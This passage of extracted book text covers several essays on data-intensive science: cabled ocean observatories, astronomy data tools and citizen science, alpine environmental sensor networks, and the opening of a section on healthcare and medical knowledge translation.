simulations; (2) When the models and the data disagree, assuming the data are valid, we must immediately adapt at-sea sensor-robot systems to fully characterize the events that are unfolding because they obviously offer new insights into the complexities we seek to capture in the failed models; (3) By making and archiving all observations and measurements in coherently indexed time and space frameworks, we can allow many investigators (even those not involved in the data collection) to examine correlations among any number of selected phenomena during, or long after, the time that the events or processes occur. If the archived data are immediately and widely available via the Internet, the potential for discovery rises substantially because of the growing number of potential investigators who can explore a rapidly expanding spectrum of parameter space. For scientists operating in this data-intensive environment, there will be a need for development of a new suite of scientific workflow products that can facilitate the archiving, assimilation, visualization, modeling, and interpretation of the information about all scientific systems of interest. Several workshop reports that offer examples of these workflow products are available in the open literature [1, 2]. Emergence and Convergence Ocean science is becoming the beneficiary of a host of powerful emergent technologies driven by many communities that are entirely external to the world of ocean researchthey include, but are not limited to, nanotechnology, biotechnology, information technology, computational modeling, imaging technologies, and robotics. More powerful yet will be the progressive convergence of these enabling capabilities as they are adapted to conduct sophisticated remote marine operations in novel ways by combining innovative technologies into appropriate investigative or experimental systems. For example, computer-enabled support activities must include massive data storage systems, cloud computing, scientific workflow, advanced visualization displays, and handheld supercomputing. Instead of batteries and satellites being used to operate remote installations, electrical power and the vast bandwidth of optical fiber will be used to transform the kinds of scientific and educational activities that can be conducted within the ocean. Adaptation of industry-standard electrooptical cables for use in oceanographic research can fundamentally change the nature of human telepresence throughout the full volume of the oceans by introducing unprecedented but routinely available power and bandwidth into ocean space. High-resolution optical and acoustic sensing will be part of the broader technology 31 of ocean imaging systems. These approaches will include routine use of highdefinition video, in stereo if needed, as well as high-resolution sonar, acoustic lenses, laser imaging, and volumetric sampling. Advanced sensor technologies will include chemical sensing using remote, and mobile, mass spectrometers and gas chromatographs, eco-genomic analysis, and adaptive sampling techniques. An Integrated Approach After decades of planning [3, 4], the U.S. National Science Foundation (NSF) is on the verge of investing more than US$600 million over 6 years in the construction and early operation of an innovative infrastructure known as the Ocean Observatories Initiative (OOI) [4]. The design life of the program is 25 years. In addition to making much-needed high-latitude and coastal measurements supported by relatively low-bandwidth satellite communications systems, this initiative will include a transformative undertaking to implement electro-optically cabled observing systems in the northeast Pacific Ocean [5-7] off the coasts of Washington, Oregon, and British Columbia, as illustrated in Figure 2.1 These interactive, distributed sensor networks in the U.S. and Canada will create a large-aperture natural laboratory for conducting a wide range of long-term innovative experiments within the ocean volume using real-time control over the entire laboratory system. Extending unprecedented power and bandwidth to a wide range of interactive sensors, instruments, and robots distributed throughout the ocean water, at the air-sea interface, on the seafloor, and below the seafloor within drill holes will empower next-generation creativity and exploration of the time domain among a broad spectrum of investigators. The University of Washington leads the cabled component of the NSF initiative, known as the Regional Scale Nodes (formerly known, and funded, as NEPTUNE); the University of Victoria leads the effort in Canada, known as NEPTUNE Canada. The two approaches were conceived jointly in 2000 as a collaborative U.S.-Canadian effort. The Consortium for Ocean Leadership in Washington, D.C., is managing and integrating the entire OOI system for NSF. Woods Hole Oceanographic Institution and the University of California, San Diego, are responsible for overseeing the Coastal-Global and CyberInfrastructure portions of the program, respectively. Oregon State University and Scripps Institution of Oceanography are participants in the Coastal-Global portion of the OOI. 1 32 FIGURE 2. A portion of the OOI focuses on the dynamic behavior of the Juan de Fuca Plate and the energetic processes operating in the overlying ocean and atmosphere. Recent modifications in the Regional Scale Nodes (RSN) have focused on delivery of the elements shown in red, and the pink components are future expansion. The inset shows the crest of Axial Seamount along the active Juan de Fuca Ridge. Each square block site will provide unprecedented electrical power and bandwidth available for research and education. Many of the processes shown in Figure 1 can be examined at the sites here. Image created by CEV for OOI-RSN. The cabled ocean observatory approach will revolutionize ocean science by providing interactive access to ocean data and instruments 24/7/365 over two to three decades. More than 1,200 kilometers of electro-optical submarine cable will deliver many tens of kilowatts of power to seafloor nodes, where instruments that might spread over a 50 km radius for each node will be plugged in directly or via secondary extension cables. The primary cable will provide between 2.5 and 10 gigabit/sec bandwidth connectivity between land and a growing number of fixed sensor packages and mobile sensor platforms. We expect that a host of novel approaches to oceanography will evolve based on the availability of in situ power and bandwidth. A major benefit will be the real-time data return and command-control of fleets of remotely operated vehicles (ROVs) and autonomous underwater vehicles 33 FIGURE 3. Next-generation scientists or citizens. This virtual picture shows a deep ocean octopus, known as Grimpoteuthis, and a portion of a submarine hydrothermal system on the Juan de Fuca Ridge. Such real-time displays of 3-D HD video will be routine within 5 years. Graphic designed by Mark Stoermer and created by CEV for NEPTUNE in 2005. (AUVs). The infrastructure will be adaptable, expandable, and exportable to interested users. Data policy for the OOI calls for all information to be made available to all interested users via the Internet (with the exception of information bearing on national security). Hardwired to the Internet, the cabled observatories will provide scientists, students, educators, and the public with virtual access to remarkable parts of our planet that are rarely visited by humans. In effect, the Internet will be extended to the seafloor, with the ability to interact with a host of instruments, including HD video live from the many environments within the oceans, as illustrated in Figure 3. The cabled observatory systems will be able to capture processes at the scale of the tectonic plate, mesoscale oceanic eddies, or even smaller scales. Research into representative activities responsible for climate change, major biological productivity at the base of the food chain, or encroaching ocean acidification (to name a few) will be readily conducted with this new infrastructure. Novel studies 34 of mid-ocean spreading centers, transform faults, and especially processes in the subduction zone at the base of the continental slope, which may trigger massive earthquakes in the Pacific Northwest, will also be addressable using the same investment in the same cabled infrastructure. This interactive ocean laboratory will be enabled by a common cyberinfrastructure that integrates multiple observatories, thousands of instruments, tens of thousands of users, and petabytes of data. The goals of the cabled ocean observatory can be achieved only if the at-sea portion is complemented by state-of-the-art information technology infrastructure resulting from a strong collaborative effort between computer scientists and ocean scientists. Such collaboration will allow scientists to interact with the ocean through real-time command and control of sensors; provide models with a continuous data feed; automate data quality control and calibration; and support novel approaches to data management, analysis, and visualization. What Is Possible? Figure 4 on the next page depicts some of the potentially transformative capabilities that could emerge in ocean science by 2020. In the long term, a key element of the introduction of unprecedented power and bandwidth for use within the ocean basins will be the potential for bold and integrative designs and developments that enhance our understanding of, and perhaps our ability to predict, the behavior of Earth, ocean, and atmosphere interactions and their bearing on a sustainable planetary habitat. Conclusion The cabled ocean observatory merges dramatic technological advancements in sensor technologies, robotic systems, high-speed communication, eco-genomics, and nanotechnology with ocean observatory infrastructure in ways that will substantially transform the approaches that scientists, educators, technologists, and policymakers take in interacting with the dynamic global ocean. Over the coming decades, most nations will implement systems of this type in the offshore extensions of their territorial seas. As these systems become more sophisticated and data become routinely available via the Internet, the Internet will emerge as the most powerful oceanographic research tool on the planet. In this fashion, the legacy of Jim Gray will continue to grow as we learn to discover truths and insights within the data we already have in the can. While the cabled observatory will have profound ramifications for the manner 35 FIGURE 4. Some of the transformative developments that could become routine within 5 years with the added power of a cabled support system. The top image shows miniaturized genomic analysis systems adapted from land laboratories to the ocean to allow scientists, with the flip of a switch in their lab hundreds of miles away, to sample ambient flow remotely and run in situ gene sequencing operations within the ocean. The data can be made available on the Internet within minutes of the decision to sample microbes in an erupting submarine volcanic plume or a seasonally driven phytoplankton bloom. The lower part shows a conceptual illustration of an entire remote analyticalbiological laboratory on the seafloor that allows a variety of key measurements or dissections to be made in situ using stereo high-definition video to guide high-precision remote manipulations. Scientific concepts by Ginger Armbrust and John Delaney; graphic design by Mark Stoermer for CEV. 36 in which scientists, engineers, and educators conduct their professional activities, the most far-reaching effects may be a significant shift in public attitudes toward the oceans as well as toward the scientific process. The real-time data and highspeed communications inherent in cabled remote observing systems will also open entirely new avenues for the public to interact with the natural world. In the final analysis, having predictive models of how the ocean functions based on decades of refining sophisticated computer simulations against high-quality observations from distributed sensor networks will form the basis for learning to manage, or at least adapt to, the most powerful climate modulating system on the planetthe global ocean. Acknowledgments We gratefully acknowledge the significant influence of Jim Gray, who unflinchingly stated that this cabled ocean observing approach using high-bandwidth and real-time data flow would be integral to human progress and understanding of the world we live in. We are also pleased to acknowledge the support of the University of Washington, the National Science Foundation, the Consortium for Ocean Leadership, and the Microsoft External Research group for technical collaboration and financial support. NSF and the National Oceanographic Partnership Program were particularly supportive of the early development of the NEPTUNE concept from 1998 to 2005, through grants to J. R. Delaney. Deborah Kelley, Nancy Penrose, and Mark Stoermer contributed significantly to the preparation of this manuscript and to conversations bearing on the content. References [1] Project Trident: A Scientific Workflow Workbench Brings Clarity to Data,. [2] Two URLs for the NSF Workshop on Challenges of Scientific Workflows:. [3] National Research Council of the National Academies, Enabling Ocean Research in the 21st Century: Implementation of a Network of Ocean Observatories. Washington, D.C.: National Academies Press, 2003, p. 220. [4] Ocean Observatories Initiative (OOI) Scientific Objectives and Network Design: A Closer Look, 2007,. Ocean Leadership Web site for the Ocean Observatories Initiative: programs-and-partnerships/ocean-observing/ooi. [5] J. R. Delaney, F. N. Spiess, S. C. Solomon, R. Hessler, J. L. Karsten, J. A. Baross, R. T. Holcomb, D. Norton, R. E. McDuff, F. L. Sayles, J. Whitehead, D. Abbott, and L. Olson, Scientific rationale for establishing long-term ocean bottom observatory/laboratory systems, in Marine Minerals: 37 Resource Assessment Strategies, P. G. Teleki, M. R. Dobson, J. R. Moor, and U. von Stackelberg, Eds., 1987, pp. 389411. [6] J. R. Delaney, G. R. Heath, A. D. Chave, B. M. Howe, and H. Kirkham, NEPTUNE: Real-time ocean and earth sciences at the scale of a tectonic plate, Oceanography, vol. 13, pp. 7183, 2000, doi: 10.1109/OCEANS.2001.968033. [7] A. D. Chave, B. St. Arnaud, M. Abbott, J. R. Delaney, R. Johnson, E. Lazowska, A. R. Maffei, J. A. Orcutt, and L. Smarr, A management concept for ocean observatories based on web services, Proc. Oceans04/Techno-Ocean04, Kobe, Japan, Nov. 2004, p. 7, doi: 10.1109/ OCEANS.2004.1406486. 38 E A RT H A N D E N V I R O N M E N T to data falling from the sky. But our relatively newfound ability to store the skys? Trends in Data Growth Astronomy has a history of data collection stretching back at least to Stonehenge more than three millennia ago. Over time, the format of the information recorded by astronomers has changed, from carvings in stone to written records and hand-drawn illustrations to photographs to digital media. While the telescope (c. 1600) and the opening up of the electromagnetic spectrum beyond wavelengths visible to the human eye (c. 1940) led to qualitative changes in the nature of astronomical investigations, they did not increase the volume of collected data nearly as much as did the advent of the Digital Age. 39 Charge-coupled devices (CCDs), which came into widespread use by the 1980s, and equivalent detectors at non-optical wavelengths became much more efficient than traditional analog media (such as photographic plates). The resulting rise in the rate of photon collection caused the ongoing (and potentially perpetually accelerating) increase in data available to astronomers. The increasing capabilities and plummeting price of the digital devices used in signal processing, data analysis, and data storage, combined with the expansion of the World Wide Web, transformed astronomy from an observational science into a digital and computational science. For example, the Large Synoptic Survey Telescope (LSST), coming within the decade, will produce more data in its first year of operation1.28 petabytesthan any other telescope in history by a significant margin. The LSST will accomplish this feat by using very sensitive CCDs with huge numbers of pixels on a relatively large telescope with very fast optics (f/1.234) and a wide field of view (9.6 square degrees), and by taking a series of many shorter exposures (rather than the traditional longer exposures) that can be used to study the temporal behavior of astronomical sources. And while the LSST, Pan-STARRS, and other coming astronomical megaprojectsmany at non-optical wavelengthswill produce huge datasets covering the whole sky, other groups and individuals will continue to add their own smaller, potentially more targeted, datasets. For the remainder of this article, we will assume that the challenge of managing this explosive growth in data will be solved (likely through the clever use of cloud storage and novel data structures), and we will focus instead on how to offer better tools and novel technical and social analytics that will let us learn more about our universe. A number of emerging trends can help us find the needles in haystacks of data available over the Internet, including crowdsourcing, democratization of access via new browsing technologies, and growing computational power. Crowdsourcing The Sloan Digital Sky Survey was undertaken to image, and measure spectra for, millions of galaxies. Most of the galaxy images had never been viewed by a human because they were automatically extracted from wide-field images reduced in an automated pipeline. To test a claim that more galaxies rotate in an anticlockwise direction than clockwise, the Sloan team used custom code to create a Web page that served up pictures of galaxies to members of the public willing to play the online Galaxy Zoo game, which consists primarily of classifying the handedness of the 40 galaxies. Clever algorithms within the Zoo serve the same galaxy to multiple users as a reference benchmark and to check up on players to see how accurate they are. The results from the first years aggregated classification of galaxies by the public proved to be just as accurate as that done by astronomers. More than 50 million classifications of a million galaxies were done by the public in the first year, and the claim about right/left handed preference was ultimately refuted. Meanwhile, Hanny Van Arkel, a schoolteacher in Holland, found a galaxy that is now the bluest known galaxy in the universe. It has come under intense scrutiny by major telescopes, including the Very Large Array (VLA) radio telescope, and will soon be scrutinized by the Hubble Space Telescope. Democratizing Access via New Browsing Technologies The time needed to acquire data from any astronomical object increases at least as quickly as the square of the distance to that object, so any service that can accumulate custom ensembles of already captured images and data effectively brings the night sky closer. The use of archived online data stored in a data cloud is facilitated by new software tools, such as Microsofts WorldWide Telescope (WWT), which provide intuitive access to images of the night sky that have taken astronomers thousands and thousands of hours of telescope time to acquire. Using WWT (shown in Figure 1 on the next page), anyone can pan and zoom around the sky, at wavelengths from X-ray through radio, and anyone can navigate through a three-dimensional model of the Universe constructed from real observations, just to see whats there. Anyone can notice an unusual correspondence between features at multiple wavelengths at some position in the sky and click right through to all the published journal articles that discuss that position. Anyone can hook up a telescope to the computer running WWT and overlay live, new images on top of online images of the same piece of sky at virtually any wavelength. Anyone can be guided in their explorations via narrated tours produced by WWT users. As more and more tours are produced, WWT will become a true sky browser, with the sky as the substrate for conversations about the universe. Explorers will navigate along paths that intersect at objects of common interest, linking ideas and individuals. Hopping from tour to tour will be like surfing from Web page to Web page now. But the power of WWT goes far beyond its standalone ability. It is, and will continue to be, part of an ecosystem of online astronomy that will speed the progress of both citizen and professional science in the coming years. 41 FIGURE 1. WorldWide Telescope view of the 30 Doradus region near the Large Magellanic Cloud. Image courtesy of the National Optical Astronomy Observatory/National Science Foundation. Microsoft, through WWT, and Google, through Google Sky, have both created API (application programming interface) environments that allow the skybrowsing software to function inside a Web page. These APIs facilitate the creation of everything from educational environments for children to citizen science sites and data distribution sites for professional astronomical surveys. Tools such as Galaxy Zoo are now easy to implement, thanks to APIs. So it now falls to the astronomical and educational communities to capitalize on the publics willingness to help navigate the increasing influx of data. High-school students can now use satellite data that no one has yet analyzed to make real discoveries about the Universe, rather than just sliding blocks down inclined planes in their physics class. Amateur astronomers can gather data on demand to fill in missing information that students, professionals, and other astronomers ask for online. The collaborative and educational possibilities are truly limitless. The role of WWT and tools like it in the professional astronomy community will 42 also continue to expand. WWT in particular has already become a better way to access all-sky surveys than any extant professional tool. WWT, as part of international virtual observatory efforts, is being seamlessly linked to quantitative and research tools that astronomers are accustomed to, in order to provide a beautiful contextual viewer for information that is usually served only piecemeal. And it has already begun to restore the kinds of holistic views of data that astronomers were used to before the Digital Age chopped up the sky into so many small pieces and incompatible formats. Growing Computational Power In 10 years, multi-core processors will enhance commodity computing power two to three orders of magnitude beyond todays computers. How will all this computing power help to address the data deluge? Faster computers and increased storage and bandwidth will of course enable our contemporary approaches to scale to larger datasets. In addition, fully new ways of handling and analyzing data will be enabled. For example, computer vision techniques are already surfacing in consumer digital cameras with face detection and recognition as common features. More computational power will allow us to triage and potentially identify unique objects, events, and data outliers as soon as they are detected and route them to citizen-scientist networks for confirmation. Engagement of citizen scientists in the alerting network for this last leg of detection can be optimized through betterdesigned interfaces that can transform work into play. Interfaces could potentially connect human confirmation of objects with global networks of games and simulations where real-time data is broadly distributed and integrated into real-time massive multiplayer games that seamlessly integrate the correct identification of the objects into the games success metrics. Such games could give kids the opportunity to raise their social stature among game-playing peers while making a meaningful contribution to science. Visualization and Analysis for the Future WWT offers a glimpse of the future. As the diversity and scale of collected data expand, software will have to become more sophisticated in terms of how it accesses data, while simultaneously growing more intuitive, customizable, and compatible. The way to improve tools like WWT will likely be linked to the larger challenge of how to improve the way visualization and data analysis tools can be used together in all fieldsnot just in astronomy. 43 Visualization and analysis challenges are more common across scientific fields than they are different. Imagine, for example, an astronomer and a climate scientist working in parallel. Both want to study the properties of physical systems as observed within a spherical coordinate system. Both want to move seamlessly back and forth between, for example, spectral line observations of some sources at some specific positions on a sphere (e.g., to study the composition of a stellar atmosphere or the CO2 in the Earths atmosphere), the context for those positions on the sphere, and journal articles and online discussions about these phenomena. Today, even within a discipline, scientists are often faced with many choices of how to accomplish the same subtask in analysis, but no package does all the subtasks the way they would prefer. What the future holds is the potential for scientists, or data specialists working with scientists, to design their own software by linking componentized, modular applications on demand. So, for example, the astronomer and the climate scientist could both use some generalized version of WWT as part of a separate, customized system that would link to their favorite discipline- or scientist-specific packages for tasks such as spectral-line analysis. Conclusion The question linking the three topics we have discussed here is, How can we design new tools to enhance discovery in the data deluge to come in astronomy? The answer seems to revolve around improved linkage between and among existing resourcesincluding citizen scientists willing to help analyze data; accessible image browsers such as WWT; and more customized visualization tools that are mashed up from common components. This approach, which seeks to more seamlessly connect (and reuse) diverse components, will likely be common to many fields of sciencenot just astronomyin the coming decade. 44 E A RT H A N D E N V I R O N M E N T Michae l Lehning Nichol as Dawes Mathias Bavay WSL Institute for Snow and Avalanche Research SLF Marc Par l ange cole Polytechnique Fdrale de Lausanne Suman Nath Feng Zhao Microsoft Research ncreasing. This is especially the case in mountainous regions with highly complex surfacesthe source of much of the worlds fresh water and weather patterns. The amount of data required to understand and model these interactions is so massive (terabytes, and increasing) that no off-the-shelf solution allows scientists to easily manage and analyze it. This has led to rapidly growing global collaboration among environmental scientists and computer scientists to approach these problems systematically and to develop sensing and database solutions that will enable environmental scientists to conduct their next-generation experiments. The next generation of environmental science, as shown in Figure 1, is motivated by the following observations by the atmospheric science community: First, the most prominent challenge 45 in weather and climate prediction is represented by land-atmosphere interaction processes. Second, the average effect of a patchy surface on the atmosphere can be very different from an effect that is calculated by averaging a particular surface property such as temperature or moisture [1-3]particularly in the mountains, where surface variability is typically very high. Figure 2 shows an example of thisa FIGURE 1. highly complex mountain surface with A typical data source context for nextbare rocks, debris-covered permafrost, generation environmental science, with a patchy snow cover, sparse trees, and heterogeneous sensor deployment that inshallow and deep soils with varying cludes (1) mobile stations, (2) high-resolution vegetation. All of these surface features conventional weather stations, (3) full-size can occur within a single kilometera snow/weather stations, (4) external weather resolution that is typically not reached stations, (5) satellite imagery, (6) weather radar, (7) mobile weather radar, (8) stream by weather forecast models of even the observations, (9) citizen-supplied observalatest generation. Existing models of tions, (10) ground LIDAR, (11) aerial LIDAR, weather prediction and climate change (12) nitrogen/methane measures, (13) snow still operate using a grid resolution, hydrology and avalanche probes, (14) seismic which is far too coarse (multiple kilomeprobes, (15) distributed optical fiber temperaters) to explicitly and correctly map the ture sensing, (16) water quality sampling, surface heterogeneity in the mountains (17) stream gauging stations, (18) rapid mass movements research, (19) runoff stations, and (and elsewhere). This can lead to severe (20) soil research. errors in understanding and prediction. In next-generation environmental science, data resolution will be addressed using densely deployed (typically wireless) sensor networks. Recent developments in wireless sensing have made it possible to instrument and sense the physical world with high resolution and fidelity over an extended period of time. Wireless connections enable reliable collection of data from remote sensors to send to laboratories for processing, analyzing, and archiving. Such high-resolution sensing enables scientists to understand more precisely the variability and dynamics of environmental parameters. Wireless sensing also provides scientists with safe and convenient visibility of in situ sensor deploy- 46 778500 187000 778750 779000 779250 779500 779750 186750 186500 186250 186000 185750 Snow Depth in Millimeters 4/26/2008 1400-1600 600-800 No Snow >1600 800-1000 0-200 1000-1200 200-400 1200-1400 400-600 Cartography and Design: Grnewald T. Base Map: Landeskarte der Schweiz Nr. 1197 1:25000 FIGURE 2. Terrestrial laser scan for snow distribution in the Swiss Alps showing typical patchy snow cover. ments and allows them to enable, debug, and test the deployments from the laboratory. This helps minimize site visits, which can be costly, time consuming, and even dangerous. However, dense sensor deployments in harsh, remote environments remain challenging for several reasons. First, the whole process of sensing, computation, and communication must be extremely energy efficient so that sensors can remain operational for an extended period of time using small batteries, solar panels, or other environmental energy. Second, sensors and their communication links must be fairly robust to ensure reliable data acquisition in harsh outdoor environments. Third, invalid sensor data due to system failures or environmental impacts must be identified and treated accordingly (e.g., flagged or even filtered from the dataset). Although recent research (including the Swiss Experiment and Life Under Your Feet) partially addresses these issues, further research is needed to address them in many production systems. 47 High-resolution environmental sensing introduces severe data management challenges for scientists. These include reliably archiving large volumes (many terabytes) of data, sharing such data with users within access control policies, and maintaining sufficient context and provenance of sensor data using correct metadata [4]. Environmental scientists can use commercial database tools to address many of the data management and exploratory challenges associated with such a massive influx of data. For example, Microsofts SenseWeb project [5] provides an infrastructure, including an underlying Microsoft SQL Server database, for archiving massive amounts of sensor data that might be compressed and distributed over multiple computers. SenseWeb also maintains suitable data indexes and enables efficient query processing to help users quickly explore the dataset to find features for detailed analysis [5-7]. But even with these capabilities, SenseWeb hits just the tip of the iceberg of the challenging data management tasks facing environmental scientists. Additional tools are necessary to efficiently integrate sensor data with relevant context and provide data provenance. Querying such data in a unified framework remains challenging. More research is also needed to deal with uncertain data that comes from noisy sensors and to handle the constant data flow from distributed locations. To better understand environmental phenomena, scientists need to derive and apply various models to transform sensor data into scientific and other practical results. Database technology can help scientists to easily integrate observational data from diverse sources, possibly distributed over the Internet, with model assessments and forecastsa procedure known as data assimilation. Sophisticated data mining techniques can allow scientists to easily explore spatiotemporal patterns of data (both interactively as well as in batch on archived data). Modeling techniques can provide correct and timely prediction of phenomena such as flooding events, landslides, or avalanche cycles, which can be highly useful for intervention and damage prevention, even with just a few hours of lead time. This very short-term forecasting is called nowcasting in meteorology. Scientists in the Swiss Experiment project1 have made progress in useful data assimilation and nowcasting. One case study in this project applies advanced sensors and models to forecasting alpine natural hazards [8]. A refined nowcast relies on the operational weather forecast to define the target area of a potential storm that 1 48 would affect a small-scale region (a few square kilometers) in the mountains. The operational weather forecast should allow sufficient time to install local mobile stations (such as SensorScope stations2) and remote sensing devices at the target area and to set up high-resolution FIGURE 3. hazard models. In the long SensorMap showing temperature distribution overlaid on 3-D mountain terrain. term, specialized weather forecast models will be developed to allow much more precise local simulation. To increase the publics environmental awareness and to support decision and policy makers, useful findings from scientific experiments must be presented and disseminated in a practical fashion. For example, SenseWeb provides a Web-based front end called SensorMap3 that presents real-time and historical environmental factors in an easy-to-understand visual interface. It overlays spatial visualizations (such as icons showing current air pollution at a location or images showing distribution of snowfalls) over a browsable geographic map, plays the visualizations of selected environmental datasets as a movie on top of a geographic map, and shows important trends in historic environmental data as well as useful summaries of real-time environmental data. (See Figure 3.) At present, such platforms support only a limited set of visualizations, and many challenges remain to be solved to support the more advanced visualizations required by diverse audiences. Worldwide Environmental Monitoring We have described the next-generation environmental monitoring system as isolatedfocused on a particular region of interest such as a mountain range, ice field, or forest. This is how such environmental systems are starting to be deployed. However, we foresee far more extensive monitoring systems that can allow scientists to share data with one another and combine and correlate data from millions of 2 3 49 sensors all over the world to gain an even better understanding of global environmental patterns. Such a global-scale sensor deployment would introduce unprecedented benefits and challenges. As sensor datasets grow larger, traditional data management techniques (such as loading data into a SQL database and then querying it) will clearly prove inadequate. To avoid moving massive amounts of data around, computations will need to be distributed and pushed as close to data sources as possible [7]. To reduce the storage and communication footprint, datasets will have to be compressed without loss of fidelity. To support data analysis with reasonable latencies, computation should preferably be done over compressed data [9]. Scientific analysis will also most likely require additional metadata, such as sensor specifications, experiment setups, data provenance, and other contextual information. Data from heterogeneous sources will have to be integrated in a unified data management and exploration framework [10]. Obviously, computer science tools can enable this next-generation environmental science only if they are actually used by domain scientists. To expedite adoption by domain scientists, such tools must be intuitive, easy to use, and robust. Moreover, they cannot be one-size-fits-all tools for all domains; rather, they should be domain-specific custom toolsor at least custom variants of generic tools. Developing these tools will involve identifying the important problems that domain scientists are trying to answer, analyzing the design trade-offs, and focusing on important features. While such application engineering approaches are common for non-science applications, they tend not to be a priority in science applications. This must change. Conclusion The close collaboration between environmental science and computer science is providing a new and better way to conduct scientific research through highresolution and high-fidelity data acquisition, simplified large-scale data management, powerful data modeling and mining, and effective data sharing and visualization. In this paper, we have outlined several challenges to realizing the vision of next-generation environmental science. Some significant progress has been made in this contextsuch as in the Swiss Experiment and SenseWeb, in which an advanced, integrated environmental data infrastructure is being used by a variety of large environmental research projects, for environmental education, and by individual scientists. Meanwhile, dramatic progress is being made in complementary 50 fields such as basic sensor technology. Our expectation is that all of these advances in instrumenting the Earth will help us realize the dreams of next-generation environmental scienceallowing scientists, government, and the public to better understand and live safely in their environment. References [1] M. Bavay, M. Lehning, T. Jonas, and H. Lwe, Simulations of future snow cover and discharge in Alpine headwater catchments, Hydrol. Processes, vol. 22, pp. 95108, 2009, doi: 10.1002/ hyp.7195. [2] M. Lehning, H. Lwe, M. Ryser, and N. Raderschall, Inhomogeneous precipitation distribution and snow transport in steep terrain, Water Resour. Res., vol. 44, 2008, doi: 10.1029/2007WR006545. [3] N. Raderschall, M. Lehning, and C. Schr, Fine scale modelling of the boundary layer wind field over steep topography, Water Resour. Res., vol. 44, 2008, doi: 10.1029/2007WR006544. [4] N. Dawes, A. K. Kumar, S. Michel, K. Aberer, and M. Lehning, Sensor Metadata Management and Its Application in Collaborative Environmental Research, presented at the 4th IEEE Int. Conf. e-Science, 2008. [5] A. Kansal, S. Nath, J. Liu, and F. Zhao, SenseWeb: An Infrastructure for Shared Sensing, IEEE MultiMedia, vol. 14, no. 4, pp. 813, Oct. 2007, doi: 10.1109/MMUL.2007.82. [6] Y. Ahmad and S. Nath, COLR-Tree: Communication Efficient Spatio-Temporal Index for a Sensor Data Web Portal, presented at the Int. Conf. Data Engineering, 2008, doi: 10.1.1.65.6941. [7] A. Deshpande, S. Nath, P. B. Gibbons, and S. Seshan, Cache-and-Query for Wide Area Sensor Databases, Proc. 22nd ACM SIGMOD Int. Conf. Management of Data Principles of Database Systems, 2003, doi: 10.1145/872757.872818. [8] M. Lehning and C. Wilhelm, Integral Risk Management and Physical Modelling for Mountainous Natural Hazards, in Extreme Events in Nature and Society, S. Albeverio, V. Jentsch, and H. Kantz, Eds. Springer, 2005. [9] G. Reeves, J. Liu, S. Nath, and F. Zhao, Managing Massive Time Series Streams with MultiScale Compressed Trickles, Proc. 35th Int. Conf. Very Large Data Bases, 2009. [10] S. Nath, J. Liu, and F. Zhao, Challenges in Building a Portal for Sensors World-Wide, presented at the First Workshop on World-Sensor-Web, 2006, doi: 10.1109/MPRV.2007.27. 51 2 . H E A LT H A N D W E L L B E I N G H E A LT H A N D W E L L B E I N G Introduction art 2 of this book explores the remarkable progress and challenges we are seeing in the most intimate and personal of our sciences, the one with the most immediate impact on all of us across the planet: the science of health and medicine. The first article sets the scene. Gillam et al. describe the progress of medical science over human history and make a strong case for a convergence of technologies that will change the face of healthcare within our lifetime. The remaining articles shed light on the convergent strands that make up this larger picture, by focusing on particular medical science challenges and the technologies being developed to overcome them. Any assertion that the coming healthcare revolution will be universal is credible only if we can demonstrate how it can cross the economic and social divides of the modern world. Robertson et al. show that a combination of globally pervasive cell phone technology and the computational technique of Bayesian networks can enable collection of computerized healthcare records in regions where medical care is sparse and can also provide automated, accurate diagnoses. An understanding of the human brain is one of the grand challenges of medicine, and Lichtman et al. describe their approach to the generation of the vast datasets needed to understand this most 55 complex of structures. Even imaging the human brain at the subcellular level, with its estimated 160 trillion synaptic connections, is a challenge that will test the bounds of data storage, and that is merely the first step in deducing function from form. An approach to the next stage of understanding how we think is presented by Horvitz and Kristan, who describe techniques for recording sequences of neuronal activity and correlating them with behavior in the simplest of organisms. This work will lead to a new generation of software tools, bringing techniques of machine learning/artificial intelligence to generate new insights into medical data. While the sets of data that make up a personal medical record are orders of magnitude smaller than those describing the architecture of the brain, current trends toward universal electronic healthcare records mean that a large proportion of the global population will soon have records of their health available in a digital form. This will constitute in aggregate a dataset of a size and complexity rivaling those of neuroscience. Here we find parallel challenges and opportunities. Buchan, Winn, and Bishop apply novel machine learning techniques to this vast body of healthcare data to automate the selection of therapies that have the most desirable outcome. Technologies such as these will be needed if we are to realize the world of the Healthcare Singularity, in which the collective experience of human healthcare is used to inform clinical best practice at the speed of computation. While the coming era of computerized health records promises more accessible and more detailed medical data, the usability of this information will require the adoption of standard forms of encoding so that inferences can be made across datasets. Cardelli and Priami look toward a future in which medical data can be overlaid onto executable models that encode the underlying logic of biological systemsto not only depict the behavior of an organism but also predict its future condition or reaction to a stimulus. In the case of neuroscience, such models may help us understand how we think; in the case of medical records, they may help us understand the mechanisms of disease and treatment. Although the computational modeling of biological phenomena is in its infancy, it provides perhaps the most intriguing insights into the emerging complementary and synergistic relationship between computational and living systems. 56 H E A LT H A N D W E L L B E I N G Michael G illam Cr aig Feied Jonathan Handle r E liza Moody Microsoft Ben Shneide r man Cathe r ine Plaisant University of Maryland Mar k Sm ith MedStar Health Institutes for Innovation John Dick ason Private practice returned home after completing the first-ever sea voyage from Europe to India, he had less than half of his original crew with him scurvy had claimed the lives of 100 of the 160 men. Throughout the Age of Discovery,1 scurvy was the leading cause of death among sailors. Ship captains typically planned for the death of as many as half of their crew during long voyages. A dietary cause for scurvy was suspected, but no one had proved it. More than a century later, on a voyage from England to India in 1601, Captain James Lancaster placed the crew of one of his four ships on a regimen of three teaspoons of lemon juice a day. By the halfway point of the trip, almost 40% of the men (110 of 278) on three of the ships had died, while on the lemon-supplied ship, every man survived [1]. The British navy responded to this discovery by repeating the experiment146 years later. In 1747, a British navy physician named James Lind treated sailors suffering from scurvy using six randomized approaches and demonstrated that citrus reversed the symptoms. The British navy responded, 48 years later, by enacting new dietary guidelines requiring citrus, which virtually eradicated scurvy from the British fleet overnight. The British Board of Trade adopted similar dietary n 1499, when portuguese explorer vasco da gama 1 57 practices for the merchant fleet in 1865, an additional 70 years later. The total time from Lancasters definitive demonstration of how to prevent scurvy to adoption across the British Empire was 264 years [2]. The translation of medical discovery to practice has thankfully improved substantially. But a 2003 report from the Institute of Medicine found that the lag between significant discovery and adoption into routine patient care still averages 17 years [3, 4]. This delayed translation of knowledge to clinical care has negative effects on both the cost and the quality of patient care. A nationwide review of 439 quality indicators found that only half of adults receive the care recommended by U.S. national standards [5]. The Impact of the Information Explosion in Medicine Despite the adoption rate of medical knowledge significantly improving, we face a new challenge due to the exponential increase in the rate of medical knowledge discovery. More than 18 million articles are currently catalogued in the biomedical literature, including over 800,000 added in 2008. The accession rate has doubled every 20 years, and the number of articles per year is expected to 